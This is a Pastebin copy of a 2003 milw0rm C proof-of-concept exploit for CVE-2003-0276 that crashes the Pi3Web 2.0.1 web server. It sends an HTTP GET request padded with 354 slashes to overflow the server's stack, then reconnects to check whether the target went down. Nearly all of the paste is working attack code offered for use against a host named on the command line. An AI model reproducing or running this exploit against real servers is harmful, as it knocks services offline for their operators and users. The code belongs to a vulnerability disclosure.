Advertisement
FlyFar

Pi3Web 2.0.1 - Denial of Service (PoC) - CVE-2003-0276

Jan 26th, 2024
640
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.13 KB | Cybersecurity | 0 0
  1. /* Pi3Web 2.0.1 DoS - Pr00f of concept.
  2. *
  3. * Vulnerable systems: Pi3Web 2.0.1 (maybe others)
  4. * Vendor: www.johnroy.com/pi3  - http://pi3web.sourceforge.net/
  5. * Patch: no yet.
  6. *
  7. * Info: Pi3Web Server is vulnerable to a denial of Service.
  8. * when a malformed HTTP Request is done the webserver hangs
  9. * due to an stack overflow. GET /////////..[354]../////////
  10. *
  11. * Found by aT4r@3wdesign.es  04/26/2003
  12. * Compiled with: lcc-win32 v3.3.
  13. *
  14. */
  15.  
  16. #pragma comment (lib,"ws2_32")
  17. #include <stdio.h>
  18. #include <windows.h>
  19. #include <winsock2.h>
  20. #include <string.h>
  21.  
  22. char evilbuffer[1024],evilrequest[512],ip[15];
  23. short port=80;
  24.  
  25.  
  26. int isalive(int OPT)
  27. {
  28.     struct sockaddr_in haxorcitos;
  29.     int fd;
  30.  
  31.     haxorcitos.sin_port = htons(port);
  32.     haxorcitos.sin_family = AF_INET;
  33.     haxorcitos.sin_addr.s_addr = inet_addr(ip);
  34.  
  35.     if ((fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  36.     {
  37.         printf(" [-] Unable to Create Socket\n\n");
  38.         return(0);
  39.     }
  40.     if (connect(fd,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos)) == -1)
  41.     {
  42.         if (OPT==0)
  43.             printf(" [+] Exploit Success. Remote webserver shutdown\n");
  44.         else
  45.             printf(" [-] Unable to connect\n\n");
  46.         return(0);
  47.     }
  48.     if (OPT==0)
  49.     {
  50.         printf(" [-] Exploit Failed. System Patched?\n\n");
  51.     }
  52.     else
  53.     {
  54.         send(fd,evilbuffer, strlen(evilbuffer),0);
  55.         printf(" [+] Data Sent. Now Checking Host\n");
  56.         closesocket(fd);
  57.  
  58.     }
  59. return(1);
  60. }
  61.  
  62.  
  63. void usage(void)
  64. {
  65.     printf(" [+] Usage: PiDoS.exe HOST [port]\n\n");    exit(1);
  66. }
  67.  
  68.  
  69. void main(int argc,char *argv[])
  70. {
  71.     WSADATA ws;
  72.  
  73.     if  (WSAStartup( MAKEWORD(1,1), &ws )!=0)
  74.     {
  75.         printf(" [+] WSAStartup() error\n");
  76.         exit(0);
  77.     }
  78.  
  79.     printf("\n . .. ...:Pi3Web Denial of Service (aT4r@3wdesign.es) :...
  80. ..\n\n");
  81.  
  82.     if ((argc!=2) && (argc!=3))
  83.         usage();
  84.  
  85.     strcpy(ip,argv[1]);
  86.     if (argc==3) port=atoi(argv[2]);
  87.  
  88.     memset(evilrequest,0,512);
  89.     memset(evilbuffer,0,1024);
  90.     memset(evilrequest,'/',354);
  91.     //sprintf(evilbuffer, "GET %s\r\n",evilrequest);
  92.     sprintf(evilbuffer,"GET %s HTTP/1.0\r\nUser-Agent: foo\r\nHost:
  93. %s\r\n\r\n\r\n",evilrequest,argv[2]);
  94.  
  95.     if (isalive(1))
  96.         { sleep(1000); isalive(0);}
  97.  
  98. }
  99.  
  100. // milw0rm.com [2003-04-29]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement